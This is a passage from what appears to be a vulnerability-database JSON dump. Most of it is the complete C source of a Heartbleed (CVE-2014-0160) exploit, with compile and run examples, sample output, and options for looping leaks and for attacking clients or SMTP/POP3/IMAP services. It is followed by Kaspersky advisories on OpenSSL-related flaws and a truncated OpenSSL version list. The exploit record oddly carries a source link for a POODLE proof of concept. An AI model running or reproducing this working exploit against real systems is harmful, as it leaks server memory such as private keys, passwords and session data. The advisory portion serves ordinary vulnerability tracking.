assignments and vendor information are also available in the NVD.[8] \n \n \n \nExploit \n \n \n \n/* \n* Heartbleed OpenSSL information leak exploit \n* ========================================================= \n* This exploit uses OpenSSL to create an encrypted connection \n* and trigger the heartbleed leak. The leaked information is \n* returned within encrypted SSL packets and is then decrypted \n* and wrote to a file to annoy IDS/forensics. The exploit can \n* set heartbeat payload length arbitrarily or use two preset \n* values for NULL and MAX length. The vulnerability occurs due \n* to bounds checking not being performed on a heap value which \n* is user supplied and returned to the user as part of DTLS/TLS \n* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to \n* 1.0.1f are known affected. You must run this against a target \n* which is linked to a vulnerable OpenSSL library using DTLS/TLS. \n* This exploit leaks upto 65535 bytes of remote heap each request \n* and can be run in a loop until the connected peer ends connection. \n* The data leaked contains 16 bytes of random padding at the end. \n* The exploit can be used against a connecting client or server, \n* it can also send pre_cmd's to plain-text services to establish \n* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients \n* will often forcefully close the connection during large leak \n* requests so try to lower your payload request size. \n* \n* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g \n* \n* E.g. \n* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed \n* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1 \n* [ heartbleed OpenSSL information leak exploit \n* [ ============================================================= \n* [ connecting to 192.168.11.23 443/tcp \n* [ connected to 192.168.11.23 443/tcp \n* [ <3 <3 <3 heart bleed <3 <3 <3 \n* [ heartbeat returned type=24 length=16408 \n* [ decrypting SSL packet \n* [ heartbleed leaked length=65535 \n* [ final record type=24, length=16384 \n* [ wrote 16381 bytes of heap to file 'out' \n* [ heartbeat returned type=24 length=16408 \n* [ decrypting SSL packet \n* [ final record type=24, length=16384 \n* [ wrote 16384 bytes of heap to file 'out' \n* [ heartbeat returned type=24 length=16408 \n* [ decrypting SSL packet \n* [ final record type=24, length=16384 \n* [ wrote 16384 bytes of heap to file 'out' \n* [ heartbeat returned type=24 length=16408 \n* [ decrypting SSL packet \n* [ final record type=24, length=16384 \n* [ wrote 16384 bytes of heap to file 'out' \n* [ heartbeat returned type=24 length=42 \n* [ decrypting SSL packet \n* [ final record type=24, length=18 \n* [ wrote 18 bytes of heap to file 'out' \n* [ done. \n* $ ls -al out \n* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out \n* $ hexdump -C out \n* - snip - snip \n* \n* Use following example command to generate certificates for clients. \n* \n* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\ \n* -keyout server.key -out server.crt \n* \n* Debian compile with \"gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\ \n* -lssl -Wl,-Bdynamic -lssl3 -lcrypto\" \n* \n* todo: add udp/dtls support. \n* \n* - Beyondtrust \n* http://www.beyondtrust.com \n* \n*/ \n#include <stdio.h> \n#include <stdint.h> \n#include <stdlib.h> \n#include <string.h> \n#include <unistd.h> \n#include <getopt.h> \n#include <signal.h> \n#include <netdb.h> \n#include <fcntl.h> \n#include <sys/socket.h> \n#include <sys/types.h> \n#include <netinet/in.h> \n#include <inttypes.h> \n#include <openssl/bio.h> \n#include <openssl/ssl.h> \n#include <openssl/err.h> \n#include <openssl/evp.h> \n#include <openssl/tls1.h> \n#include <openssl/rand.h> \n#include <openssl/buffer.h> \n \n#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\ \n(((unsigned int)(c[1])) )),c+=2) \n#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\ \nc[1]=(unsigned char)(((s) )&0xff)),c+=2) \n \nint first = 0; \nint leakbytes = 0; \nint repeat = 1; \nint badpackets = 0; \n \ntypedef struct { \nint socket; \nSSL *sslHandle; \nSSL_CTX *sslContext; \n} connection; \n \ntypedef struct { \nunsigned char type; \nshort version; \nunsigned int length; \nunsigned char hbtype; \nunsigned int payload_length; \nvoid* payload; \n} heartbeat; \n \nvoid ssl_init(); \nvoid usage(); \nint tcp_connect(char*,int); \nint tcp_bind(char*, int); \nconnection* tls_connect(int); \nconnection* tls_bind(int); \nint pre_cmd(int,int,int); \nvoid* heartbleed(connection* ,unsigned int); \nvoid* sneakyleaky(connection* ,char*, int); \n \nint tcp_connect(char* server,int port){ \nint sd,ret; \nstruct hostent *host; \nstruct sockaddr_in sa; \nhost = gethostbyname(server); \nsd = socket(AF_INET, SOCK_STREAM, 0); \nif(sd==-1){ \nprintf(\"[!] cannot create socket\\n\"); \nexit(0); \n} \nsa.sin_family = AF_INET; \nsa.sin_port = htons(port); \nsa.sin_addr = *((struct in_addr *) host->h_addr); \nbzero(&(sa.sin_zero),8); \nprintf(\"[ connecting to %s %d/tcp\\n\",server,port); \nret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr)); \nif(ret==0){ \nprintf(\"[ connected to %s %d/tcp\\n\",server,port); \n} \nelse{ \nprintf(\"[!] FATAL: could not connect to %s %d/tcp\\n\",server,port); \nexit(0); \n} \nreturn sd; \n} \n \nint tcp_bind(char* server, int port){ \nint sd, ret, val=1; \nstruct sockaddr_in sin; \nstruct hostent *host; \nhost = gethostbyname(server); \nsd=socket(AF_INET,SOCK_STREAM,0); \nif(sd==-1){ \nprintf(\"[!] cannot create socket\\n\"); \nexit(0); \n} \nmemset(&sin,0,sizeof(sin)); \nsin.sin_addr=*((struct in_addr *) host->h_addr); \nsin.sin_family=AF_INET; \nsin.sin_port=htons(port); \nsetsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val)); \nret = bind(sd,(struct sockaddr *)&sin,sizeof(sin)); \nif(ret==-1){ \nprintf(\"[!] cannot bind socket\\n\"); \nexit(0); \n} \nlisten(sd,5); \nreturn(sd); \n} \n \n \nvoid ssl_init(){ \nSSL_load_error_strings(); \nSSL_library_init(); \nOpenSSL_add_all_digests(); \nOpenSSL_add_all_algorithms(); \nOpenSSL_add_all_ciphers(); \n} \n \nconnection* tls_connect(int sd){ \nconnection *c; \nc = malloc(sizeof(connection)); \nif(c==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nc->socket = sd; \nc->sslHandle = NULL; \nc->sslContext = NULL; \nc->sslContext = SSL_CTX_new(SSLv23_client_method()); \nSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3); \nif(c->sslContext==NULL) \nERR_print_errors_fp(stderr); \nc->sslHandle = SSL_new(c->sslContext); \nif(c->sslHandle==NULL) \nERR_print_errors_fp(stderr); \nif(!SSL_set_fd(c->sslHandle,c->socket)) \nERR_print_errors_fp(stderr); \nif(SSL_connect(c->sslHandle)!=1) \nERR_print_errors_fp(stderr); \nif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED || \nc->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){ \nprintf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\"); \n} \nreturn c; \n} \n \nconnection* tls_bind(int sd){ \nint bytes; \nconnection *c; \nchar* buf; \nbuf = malloc(4096); \nif(buf==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nmemset(buf,0,4096); \nc = malloc(sizeof(connection)); \nif(c==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nc->socket = sd; \nc->sslHandle = NULL; \nc->sslContext = NULL; \nc->sslContext = SSL_CTX_new(SSLv23_server_method()); \nif(c->sslContext==NULL) \nERR_print_errors_fp(stderr); \nSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3); \nSSL_CTX_SRP_CTX_init(c->sslContext); \nSSL_CTX_use_certificate_file(c->sslContext, \"./server.crt\", SSL_FILETYPE_PEM); \nSSL_CTX_use_PrivateKey_file(c->sslContext, \"./server.key\", SSL_FILETYPE_PEM); \nif(!SSL_CTX_check_private_key(c->sslContext)){ \nprintf(\"[!] FATAL: private key does not match the certificate public key\\n\"); \nexit(0); \n} \nc->sslHandle = SSL_new(c->sslContext); \nif(c->sslHandle==NULL) \nERR_print_errors_fp(stderr); \nif(!SSL_set_fd(c->sslHandle,c->socket)) \nERR_print_errors_fp(stderr); \nint rc = SSL_accept(c->sslHandle); \nprintf (\"[ SSL connection using %s\\n\", SSL_get_cipher (c->sslHandle)); \nbytes = SSL_read(c->sslHandle, buf, 4095); \nprintf(\"[ recieved: %d bytes - showing output\\n%s\\n[\\n\",bytes,buf); \nif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED || \nc->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){ \nprintf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\"); \n} \nreturn c; \n} \n \nint pre_cmd(int sd,int precmd,int verbose){ \n/* this function can be used to send commands to a plain-text \nservice or client before heartbleed exploit attempt. e.g. STARTTLS */ \nint rc, go = 0; \nchar* buffer; \nchar* line1; \nchar* line2; \nswitch(precmd){ \ncase 0: \nline1 = \"EHLO test\\n\"; \nline2 = \"STARTTLS\\n\"; \nbreak; \ncase 1: \nline1 = \"CAPA\\n\"; \nline2 = \"STLS\\n\"; \nbreak; \ncase 2: \nline1 = \"a001 CAPB\\n\"; \nline2 = \"a002 STARTTLS\\n\"; \nbreak; \ndefault: \ngo = 1; \nbreak; \n} \nif(go==0){ \nbuffer = malloc(2049); \nif(buffer==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nmemset(buffer,0,2049); \nrc = read(sd,buffer,2048); \nprintf(\"[ banner: %s\",buffer); \nsend(sd,line1,strlen(line1),0); \nmemset(buffer,0,2049); \nrc = read(sd,buffer,2048); \nif(verbose==1){ \nprintf(\"%s\\n\",buffer); \n} \nsend(sd,line2,strlen(line2),0); \nmemset(buffer,0,2049); \nrc = read(sd,buffer,2048); \nif(verbose==1){ \nprintf(\"%s\\n\",buffer); \n} \n} \nreturn sd; \n} \n \nvoid* heartbleed(connection *c,unsigned int type){ \nunsigned char *buf, *p; \nint ret; \nbuf = OPENSSL_malloc(1 + 2); \nif(buf==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \np = buf; \n*p++ = TLS1_HB_REQUEST; \nswitch(type){ \ncase 0: \ns2n(0x0,p); \nbreak; \ncase 1: \ns2n(0xffff,p); \nbreak; \ndefault: \nprintf(\"[ setting heartbeat payload_length to %u\\n\",type); \ns2n(type,p); \nbreak; \n} \nprintf(\"[ <3 <3 <3 heart bleed <3 <3 <3\\n\"); \nret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3); \nOPENSSL_free(buf); \nreturn c; \n} \n \nvoid* sneakyleaky(connection *c,char* filename, int verbose){ \nchar *p; \nint ssl_major,ssl_minor,al; \nint enc_err,n,i; \nSSL3_RECORD *rr; \nSSL_SESSION *sess; \nSSL* s; \nunsigned char md[EVP_MAX_MD_SIZE]; \nshort version; \nunsigned mac_size, orig_len; \nsize_t extra; \nrr= &(c->sslHandle->s3->rrec); \nsess=c->sslHandle->session; \ns = c->sslHandle; \nif (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER) \nextra=SSL3_RT_MAX_EXTRA; \nelse \nextra=0; \nif ((s->rstate != SSL_ST_READ_BODY) || \n(s->packet_length < SSL3_RT_HEADER_LENGTH)) { \nn=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0); \nif (n <= 0) \ngoto apple; \ns->rstate=SSL_ST_READ_BODY; \np=s->packet; \nrr->type= *(p++); \nssl_major= *(p++); \nssl_minor= *(p++); \nversion=(ssl_major<<8)|ssl_minor; \nn2s(p,rr->length); \nif(rr->type==24){ \nprintf(\"[ heartbeat returned type=%d length=%u\\n\",rr->type, rr->length); \nif(rr->length > 16834){ \nprintf(\"[ error: got a malformed TLS length.\\n\"); \nexit(0); \n} \n} \nelse{ \nprintf(\"[ incorrect record type=%d length=%u returned\\n\",rr->type,rr->length); \ns->packet_length=0; \nbadpackets++; \nif(badpackets > 3){ \nprintf(\"[ error: too many bad packets recieved\\n\"); \nexit(0); \n} \ngoto apple; \n} \n} \nif (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){ \ni=rr->length; \nn=ssl3_read_n(s,i,i,1); \nif (n <= 0) goto apple; \n} \nprintf(\"[ decrypting SSL packet\\n\"); \ns->rstate=SSL_ST_READ_HEADER; \nrr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]); \nrr->data=rr->input; \ntls1_enc(s,0); \nif((sess != NULL) && \n(s->enc_read_ctx != NULL) && \n(EVP_MD_CTX_md(s->read_hash) != NULL)) \n{ \nunsigned char *mac = NULL; \nunsigned char mac_tmp[EVP_MAX_MD_SIZE]; \nmac_size=EVP_MD_CTX_size(s->read_hash); \nOPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE); \norig_len = rr->length+((unsigned int)rr->type>>8); \nif(orig_len < mac_size || \n(EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE && \norig_len < mac_size+1)){ \nal=SSL_AD_DECODE_ERROR; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT); \n} \nif (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){ \nmac = mac_tmp; \nssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len); \nrr->length -= mac_size; \n} \nelse{ \nrr->length -= mac_size; \nmac = &rr->data[rr->length]; \n} \ni = tls1_mac(s,md,0); \nif (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0) \nenc_err = -1; \nif (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size) \nenc_err = -1; \n} \nif(enc_err < 0){ \nal=SSL_AD_BAD_RECORD_MAC; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC); \ngoto apple; \n} \nif(s->expand != NULL){ \nif (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) { \nal=SSL_AD_RECORD_OVERFLOW; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG); \ngoto apple; \n} \nif (!ssl3_do_uncompress(s)) { \nal=SSL_AD_DECOMPRESSION_FAILURE; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION); \ngoto apple; \n} \n} \nif (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) { \nal=SSL_AD_RECORD_OVERFLOW; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG); \ngoto apple; \n} \nrr->off=0; \ns->packet_length=0; \nif(first==0){ \nuint heartbleed_len = 0; \nchar* fp = s->s3->rrec.data; \n(long)fp++; \nmemcpy(&heartbleed_len,fp,2); \nheartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8; \nfirst = 2; \nleakbytes = heartbleed_len + 16; \nprintf(\"[ heartbleed leaked length=%u\\n\",heartbleed_len); \n} \nif(verbose==1){ \n{ unsigned int z; for (z=0; z<rr->length; z++) printf(\"%02X%c\",rr->data[z],((z+1)%16)?' ':'\\n'); } \nprintf(\"\\n\"); \n} \nleakbytes-=rr->length; \nif(leakbytes > 0){ \nrepeat = 1; \n} \nelse{ \nrepeat = 0; \n} \nprintf(\"[ final record type=%d, length=%u\\n\", rr->type, rr->length); \nint output = s->s3->rrec.length-3; \nif(output > 0){ \nint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700); \nif(first==2){ \nfirst--; \nwrite(fd,s->s3->rrec.data+3,s->s3->rrec.length); \n/* first three bytes are resp+len */ \nprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length-3,filename); \n} \nelse{ \n/* heap data & 16 bytes padding */ \nwrite(fd,s->s3->rrec.data+3,s->s3->rrec.length); \nprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length,filename); \n} \nclose(fd); \n} \nelse{ \nprintf(\"[ nothing from the heap to write\\n\"); \n} \nreturn; \napple: \nprintf(\"[ problem handling SSL record packet - wrong type?\\n\"); \nbadpackets++; \nif(badpackets > 3){ \nprintf(\"[ error: too many bad packets recieved\\n\"); \nexit(0); \n} \nreturn; \n} \n \nvoid usage(){ \nprintf(\"[\\n\"); \nprintf(\"[ --server|-s <ip/dns> - the server to target\\n\"); \nprintf(\"[ --port|-p <port> - the port to target\\n\"); \nprintf(\"[ --file|-f <filename> - file to write data to\\n\"); \nprintf(\"[ --bind|-b <ip> - bind to ip for exploiting clients\\n\"); \nprintf(\"[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\n\"); \nprintf(\"[ 0 = SMTP\\n\"); \nprintf(\"[ 1 = POP3\\n\"); \nprintf(\"[ 2 = IMAP\\n\"); \nprintf(\"[ --loop|-l - loop the exploit attempts\\n\"); \nprintf(\"[ --type|-t <n> - select exploit to try\\n\"); \nprintf(\"[ 0 = null length\\n\"); \nprintf(\"[ 1 = max leak\\n\"); \nprintf(\"[ n = heartbeat payload_length\\n\"); \nprintf(\"[\\n\"); \nprintf(\"[ --verbose|-v - output leak to screen\\n\"); \nprintf(\"[ --help|-h - this output\\n\"); \nprintf(\"[\\n\"); \nexit(0); \n} \n \nint main(int argc, char* argv[]){ \nint ret, port, userc, index; \nint type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9; \nint loop = 0; \nstruct hostent *h; \nconnection* c; \nchar *host, *file; \nint ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0; \nprintf(\"[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\n\"); \nprintf(\"[ =============================================================\\n\"); \nstatic struct option options[] = { \n{\"server\", 1, 0, 's'}, \n{\"port\", 1, 0, 'p'}, \n{\"file\", 1, 0, 'f'}, \n{\"type\", 1, 0, 't'}, \n{\"bind\", 1, 0, 'b'}, \n{\"verbose\", 0, 0, 'v'}, \n{\"precmd\", 1, 0, 'c'}, \n{\"loop\", 0, 0, 'l'}, \n{\"help\", 0, 0,'h'} \n}; \nwhile(userc != -1) { \nuserc = getopt_long(argc,argv,\"s:p:f:t:b:c:lvh\",options,&index); \nswitch(userc) { \ncase -1: \nbreak; \ncase 's': \nif(ihost==0){ \nihost = 1; \nh = gethostbyname(optarg); \nif(h==NULL){ \nprintf(\"[!] FATAL: unknown host '%s'\\n\",optarg); \nexit(1); \n} \nhost = malloc(strlen(optarg) + 1); \nif(host==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nsprintf(host,\"%s\",optarg); \n} \nbreak; \ncase 'p': \nif(iport==0){ \nport = atoi(optarg); \niport = 1; \n} \nbreak; \ncase 'f': \nif(ifile==0){ \nfile = malloc(strlen(optarg) + 1); \nif(file==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nsprintf(file,\"%s\",optarg); \nifile = 1; \n} \nbreak; \ncase 't': \nif(itype==0){ \ntype = atoi(optarg); \nitype = 1; \n} \nbreak; \ncase 'h': \nusage(); \nbreak; \ncase 'b': \nif(ihost==0){ \nihost = 1; \nhost = malloc(strlen(optarg)+1); \nif(host==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nsprintf(host,\"%s\",optarg); \nbind = 1; \n} \nbreak; \ncase 'c': \nif(iprecmd == 0){ \niprecmd = 1; \nprecmd = atoi(optarg); \n} \nbreak; \ncase 'v': \nverbose = 1; \nbreak; \ncase 'l': \nloop = 1; \nbreak; \ndefault: \nbreak; \n} \n} \nif(ihost==0||iport==0||ifile==0||itype==0||type < 0){ \nprintf(\"[ try --help\\n\"); \nexit(0); \n} \nssl_init(); \nif(bind==0){ \nret = tcp_connect(host, port); \npre_cmd(ret, precmd, verbose); \nc = tls_connect(ret); \nheartbleed(c,type); \nwhile(repeat==1){ \nsneakyleaky(c,file,verbose); \n} \nwhile(loop==1){ \nprintf(\"[ entered heartbleed loop\\n\"); \nfirst=0; \nrepeat=1; \nheartbleed(c,type); \nwhile(repeat==1){ \nsneakyleaky(c,file,verbose); \n} \n} \nprintf(\"[ done.\\n\"); \nexit(0); \n} \nelse{ \nint sd, pid, i; \nret = tcp_bind(host, port); \nwhile(1){ \nsd=accept(ret,0,0); \nif(sd==-1){ \nprintf(\"[!] FATAL: problem with accept()\\n\"); \nexit(0); \n} \nif(pid=fork()){ \nclose(sd); \n} \nelse{ \nc = tls_bind(sd); \npre_cmd(ret, precmd, verbose); \nheartbleed(c,type); \nwhile(repeat==1){ \nsneakyleaky(c,file,verbose); \n} \nwhile(loop==1){ \nprintf(\"[ entered heartbleed loop\\n\"); \nfirst=0; \nrepeat=0; \nheartbleed(c,type); \nwhile(repeat==1){ \nsneakyleaky(c,file,verbose); \n} \n} \nprintf(\"[ done.\\n\"); \nexit(0); \n} \n} \n} \n} \n \n \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/132254/poodle-poc.txt"}], "kaspersky": [{"lastseen": "2018-07-06T07:32:21", "references": [], "description": "### *CVSS*:\n5.0\n\n### *Detect date*:\n04/28/2015\n\n### *Severity*:\nWarning\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Apple OS X Server. Malicious users can exploit these vulnerabilities to bypass security restrictions or obtain sensitive information.\n\n### *Affected products*:\nApple OS X Server versions earlier than 4.1\n\n### *Solution*:\nUpdate to the latest version \n[Get OS X Server](<https://itunes.apple.com/us/app/os-x-server/id883878097?mt=12>)\n\n### *Original advisories*:\n[Apple article](<https://support.apple.com/en-us/HT204201>) \n\n\n### *Impacts*:\nOSI \n\n### *Related products*:\n[Apple OS X](<https://threats.kaspersky.com/en/product/Apple-OS-X/>)\n\n### *CVE-IDS*:\n[CVE-2015-1150](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1150>) \n[CVE-2015-1151](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1151>) \n[CVE-2014-3566](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566>)", "edition": 10, "reporter": "Kaspersky Lab", "published": "2015-04-28T00:00:00", "title": "\r KLA10570Multiple vulnerabilities in OS X Server ", "type": "kaspersky", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "info", "cvelist": ["CVE-2014-3566", "CVE-2015-1150", "CVE-2015-1151"], "modified": "2018-07-05T00:00:00", "id": "KLA10570", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10570", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-07-06T07:32:36", "references": [], "description": "### *CVSS*:\n7.1\n\n### *Detect date*:\n07/18/2014\n\n### *Severity*:\nHigh\n\n### *Description*:\nAn obsolete version of OpenSSL was found in Tableau. By exploiting this vulnerability malicious users can cause denial of service, obtain sensitive information and bypass security. This vulnerability can be exploited remotely.\n\n### *Affected products*:\nTableau server 8.1. versions 8.1.12 and earlier \nTableau server 8.2. versions 8.2.4 and earlier\n\n### *Solution*:\nUpdate to latest version\n\n### *Original advisories*:\n[Tableau changelog](<http://www.tableausoftware.com/support/releases>) \n\n\n### *Impacts*:\nOSI \n\n### *Related products*:\n[Tableau Server](<https://threats.kaspersky.com/en/product/Tableau-Server/>)\n\n### *CVE-IDS*:\n[CVE-2014-3568](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568>) \n[CVE-2014-3567](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567>) \n[CVE-2014-3513](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513>) \n[CVE-2014-3566](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566>)", "edition": 10, "reporter": "Kaspersky Lab", "published": "2014-07-18T00:00:00", "title": "\r KLA10359Vulnerability in Tableau ", "type": "kaspersky", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "info", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2018-07-05T00:00:00", "id": "KLA10359", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10359", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-07-06T07:34:13", "references": [], "description": "### *CVSS*:\n7.1\n\n### *Detect date*:\n01/27/2015\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple serious vulnerabilities have been found in VMware products. Malicious users can exploit these vulnerabilities to gain privileges or cause denial of service.\n\n### *Affected products*:\nVMware Workstation 10 versions earlier than 10.0.5 \nVMware Player 6 versions earlier than 6.0.5 \nVMware Fusion 7 versions earlier than 7.0.1 \nVMware Fusion 6 versions earlier than 6.0.5 \nVMware vCenter Server 5.5 earlier than update 2d \nESXi 5.5 without patch ESXi550-201403102-SG, ESXi550-201501101-SG \nESXi 5.1 without patch ESXi510-201404101-SG \nESXi 5.0 without patch ESXi500-201405101-SG\n\n### *Solution*:\nUpdate to latest version \n[Get VMware products](<https://my.vmware.com/web/vmware/downloads>)\n\n### *Original advisories*:\n[VMSA](<https://www.vmware.com/security/advisories/VMSA-2015-0001>) \n\n\n### *Impacts*:\nPE \n\n### *Related products*:\n[VMware Workstation](<https://threats.kaspersky.com/en/product/VMware-Workstation/>)\n\n### *CVE-IDS*:\n[CVE-2014-3660](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3660>) \n[CVE-2014-3568](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568>) \n[CVE-2014-3567](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567>) \n[CVE-2014-3513](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513>) \n[CVE-2015-1044](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1044>) \n[CVE-2015-1043](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1043>) \n[CVE-2014-8370](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8370>) \n[CVE-2014-3566](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566>)", "edition": 8, "reporter": "Kaspersky Lab", "published": "2015-01-27T00:00:00", "title": "\r KLA10452Multiple vulnerabilities in VMware products ", "type": "kaspersky", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "info", "cvelist": ["CVE-2014-3566", "CVE-2015-1044", "CVE-2014-3513", "CVE-2014-8370", "CVE-2014-3660", "CVE-2014-3567", "CVE-2014-3568", "CVE-2015-1043"], "modified": "2018-07-05T00:00:00", "id": "KLA10452", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10452", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "openssl": [{"lastseen": "2016-09-26T17:22:34", "references": [], "edition": 1, "description": "When an OpenSSL SSL/TLS/DTLS server receives a session ticket the integrity of that ticket is first verified. In the event of a session ticket integrity check failing, OpenSSL will fail to free memory causing a memory leak. By sending a large number of invalid session tickets an attacker could exploit this issue in a Denial Of Service attack.", "reporter": "OpenSSL", "published": "2014-10-15T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "openssl", "title": "Vulnerability in OpenSSL (CVE-2014-3567)", "bulletinFamily": "software", "affectedSoftware": [{"name": "openssl", "version": "1.0.0d", "operator": "eq"}, {"name": "openssl", "version": "0.9.8p", "operator": "eq"}, {"name": "openssl", "version": "1.0.0b", "operator": "eq"}, {"name": "openssl", "version": "0.9.8q", "operator": "eq"}, {"name": "openssl", "version": "1.0.1c", "operator": "eq"}, {"name": "openssl", "version": "1.0.0", "operator": "eq"}, {"name": "openssl", "version": "0.9.8t", "operator": "eq"}, {"name": "openssl", "version": "1.0.0e", "operator": "eq"}, {"name": "openssl", "version": "0.9.8w", "operator": "eq"}, {"name": "openssl", "version": "1.0.0a", "operator": "eq"}, {"name": "openssl", "version": "1.0.1b", "operator": "eq"}, {"name": "openssl", "version": "0.9.8o", "operator": "eq"}, {"name": "openssl", "version": "0.9.8j", "operator": "eq"}, {"name": "openssl", "version": "1.0.0j", "operator": "eq"}, {"name": "openssl", "version": "0.9.8l", "operator": "eq"}, {"name": "openssl", "version": "1.0.0k", "operator": "eq"}, {"name": "openssl", "version": "0.9.8n", "operator": "eq"}, {"name": "openssl", "version": "1.0.1a", "operator": "eq"}, {"name": "openssl", "version": "1.0.1d", "operator": "eq"}, {"name": "openssl", "version": "0.9.8i", "operator": "eq"}, {"name": "openssl", "version": "0.9.8g", "operator": "eq"}, {"name": "openssl", "version": "0.9.8m", "operator": "eq"}, {"name": "openssl", "version": "0.9.8v", "operator": "eq"}, {"name": "openssl", "version": "1.0.0l", "operator": "eq"}, {"name": "openssl", "version": "0.9.8u", "operator": "eq"}, {"name": "openssl", "version": "1.0.1", "operator": "eq"}, {"name": "openssl", "version": "1.0.1f", "operator": "eq"}, {"name": "openssl", "version": "1.0.0n", "operator": "eq"}, {"name": "openssl", "version": "1.0.0m", "operator": "eq"}, {"name": "openssl", "version": "1.0.1i", "operator": "eq"}, {"name": "openssl", "version": "0.9.8x", "operator": "eq"}, 